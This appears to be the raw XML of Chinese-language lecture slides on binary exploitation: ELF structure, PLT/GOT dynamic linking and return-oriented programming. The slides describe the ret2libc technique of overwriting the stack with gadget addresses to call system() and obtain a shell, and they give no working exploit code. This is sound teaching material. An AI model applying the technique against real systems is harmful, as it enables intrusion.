        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="1564600"/>
            <a:ext cx="1180400" cy="5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.text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021" name="Shape 1021"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233" y="1564600"/>
            <a:ext cx="1180400" cy="5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foo@plt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022" name="Shape 1022"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067" y="1564600"/>
            <a:ext cx="1180400" cy="5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PLT0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023" name="Shape 1023"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="5439300"/>
            <a:ext cx="2095200" cy="4096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...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024" name="Shape 1024"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481933" y="3770184"/>
            <a:ext cx="1180400" cy="5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.got.plt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4F37C3DA-1CB0-47DA-A3D4-F60FDCC00FAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="416331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直接自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got.plt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跳转到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foo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的真实地址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没有了第一次的解析地址过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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22135E10-5A79-449D-BF7E-D72B55F83A95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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动态链接过程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C810022-AA5A-4FC5-8440-52B0537EDF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3637" y="1018235"/>
            <a:ext cx="8211309" cy="5197277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1CFDD52A-423B-4178-954C-FA62A0512EFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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动态链接过程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4456439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1CFDD52A-423B-4178-954C-FA62A0512EFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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动态链接过程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E06DCB4-6DEA-E68A-74DA-AEEEB10673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0" y="1278622"/>
            <a:ext cx="4054191" cy="4877223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D3497390-0E3C-222D-71CA-7FBB543E5198}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761462" y="1565376"/>
            <a:ext cx="4489712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加载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system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真实地址的过程：</a:t>
            </a:r>
          </a:p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首先到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plt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表中查找，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plt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一定会去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got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表查查找实际地址：</a:t>
            </a:r>
          </a:p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-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如果是第一次调用，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got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表中存储的是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plt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表项的地址，就会返回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plt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表项，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plt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通过一系列解析函数获取真实地址，然后存储到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got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表中，再去访问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libc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库中的实际地址</a:t>
            </a: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-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后续再进行调用，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got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表中已经存储了实际地址，就会直接去访问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libc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库中的实际地址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226638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CE599CD0-8759-42A7-8550-5B0375F447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0110"/>
            <a:ext cx="12192000" cy="6470769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268D2B68-29D0-47D9-A35F-5B70048C6E7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="420880" y="5982236"/>
            <a:ext cx="19992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ELF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文件结构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AA57B2A-F19A-4C54-839D-F7DD6596C1B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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二进制基础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| Linux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下的可执行文件格式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ELF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="298532777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6F542C06-4F84-45F8-A155-C9C1CA996953}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6631564" y="589958"/>
            <a:ext cx="3883027" cy="6061957"/>
            <a:chOff x="4584869" y="992499"/>
            <a:chExt cx="5738979" cy="5436216"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A8DC2CD-6D8B-473D-BD39-E56AFEDCFDC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4584869" y="992499"/>
              <a:ext cx="5738977" cy="5436216"/>
              <a:chOff x="4897548" y="888136"/>
              <a:chExt cx="1363202" cy="3513619"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{529DE509-C2E4-44BB-8BE6-C481AF3FA52E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="888136"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>For Kernel</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Shape 626">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F13D3A9-59E1-48B7-B88F-AFA6E52583E9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897548" y="1162600"/>
                <a:ext cx="1363200" cy="532702"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D023FC-2D0D-4160-AE9D-3A16DB1F7623}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1695037"/>
                <a:ext cx="1363200" cy="345399"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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" name="Shape 628">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC5BF3E-1C26-460D-BF4F-9870124E7288}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2040436"/>
                <a:ext cx="1363200" cy="442800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" name="Shape 629">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F78A3CD3-E481-4F8E-BA23-04776A31C3E4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2483236"/>
                <a:ext cx="1363200" cy="410861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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Shape 630">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3C36562-15E1-44F3-A275-54744B61749F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2894098"/>
                <a:ext cx="1363200" cy="274195"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="D9EAD3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dirty="0"/>
                  <a:t>Heap</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6286BDDF-878B-4830-8C97-41E0EAD0356C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="3331789"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F4CCCC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dirty="0"/>
                  <a:t>Data</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Shape 632">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9282ED0-348A-430C-9614-46B78381CB83}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3607695"/>
                <a:ext cx="1363200" cy="519861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D40C47C8-3847-4696-ACE1-0EAF89E09DA4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="4127555"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="15" name="Shape 634">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FDAEC4A-0225-4A8A-BE4B-B55D902BD42D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="8" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1695037"/>
                <a:ext cx="0" cy="109299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16" name="Shape 635">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83DCF5A-918C-4F83-A5BF-9C91701057AB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="11" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5579150" y="2559899"/>
                <a:ext cx="4460" cy="334199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</p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E991AC80-276A-4219-AB15-7858AE929F7C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4584879" y="1844876"/>
              <a:ext cx="5738969" cy="251142"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E4808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zh-CN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ret_addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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gadget_addr</a:t>
              </a:r>
              <a:endParaRPr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17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687AF02C-0789-432C-A9DB-7FED09A1EB89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10672628" y="1208198"/>
            <a:ext cx="858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Stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="连接符: 肘形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E0522E-454E-4538-B2E5-F09C06D10F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="1"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6631567" y="1680473"/>
            <a:ext cx="5" cy="4317113"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4572100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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hape 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{402A0AF2-2DF5-4833-A710-9AE68DA39E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631570" y="4525879"/>
            <a:ext cx="3883021" cy="28005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Bss</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B214794-FBBA-4945-A292-0508CF388B3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631567" y="2870890"/>
            <a:ext cx="3883021" cy="280050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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system()</a:t>
            </a:r>
            <a:endParaRPr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6" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{205AB67C-501F-40F0-8689-F6517E7BED78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631566" y="5424639"/>
            <a:ext cx="3883021" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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7" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA5398DD-AE7B-423E-8E84-8F2A8BAB8D0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631565" y="5687810"/>
            <a:ext cx="3883021" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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8" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88E1BCE5-B970-4E1D-82FF-E1B7AD45DB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631566" y="5929372"/>
            <a:ext cx="3883020" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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30" name="连接符: 肘形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2972708F-45F0-4F8E-98E0-FC2D921E34A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="28" idx="3"/>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10514586" y="5492854"/>
            <a:ext cx="1" cy="504733"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 22860100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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连接符 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96EAFB68-708F-4923-88DD-5E3D4754A336}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6156960" y="5492854"/>
            <a:ext cx="474606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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A878DC5F-61BF-447E-907F-4E64EBF7FBB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6156951" y="5492854"/>
            <a:ext cx="9" cy="262161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箭头连接符 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CE1A2E0-2A79-4732-A1CE-20006EBE7728}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6156951" y="5755015"/>
            <a:ext cx="474614" cy="1010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连接符 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CF40EE0-451A-4D1B-8223-CF358B34CEF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="27" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10514586" y="5756025"/>
            <a:ext cx="474606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连接符 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77ED6BB8-F57E-4314-B3FF-D518A5ABE6DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10989178" y="3010915"/>
            <a:ext cx="0" cy="2744427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箭头连接符 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17FFE878-B274-44B8-B580-E714AD5E7C63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="21" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10514588" y="3010915"/>
            <a:ext cx="474578" cy="0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文本框 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53875BE4-F753-48AB-B2FB-D393F8BBEE01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11102045" y="2784110"/>
            <a:ext cx="858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Libc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="文本框 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8C9A344-EC85-4111-8599-9A72C59B0E4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11102389" y="5545729"/>
            <a:ext cx="858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Text</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0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D1FFE461-B8E4-4C17-A1A3-67FF7C4A0306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1193067" y="2769256"/>
            <a:ext cx="33660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篡改栈帧上自返回地址开始的一段区域为一系列 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gadget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的地址，最终调用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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libc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中的函数获取 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shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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48E567E0-7103-4116-BA78-1A8F51CB386D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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ret2libc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296569562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6F542C06-4F84-45F8-A155-C9C1CA996953}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6880040" y="589958"/>
            <a:ext cx="3883027" cy="6061957"/>
            <a:chOff x="4584869" y="992499"/>
            <a:chExt cx="5738979" cy="5436216"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A8DC2CD-6D8B-473D-BD39-E56AFEDCFDC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4584869" y="992499"/>
              <a:ext cx="5738977" cy="5436216"/>
              <a:chOff x="4897548" y="888136"/>
              <a:chExt cx="1363202" cy="3513619"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{529DE509-C2E4-44BB-8BE6-C481AF3FA52E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="888136"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>For Kernel</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Shape 626">
                <a:extLst>
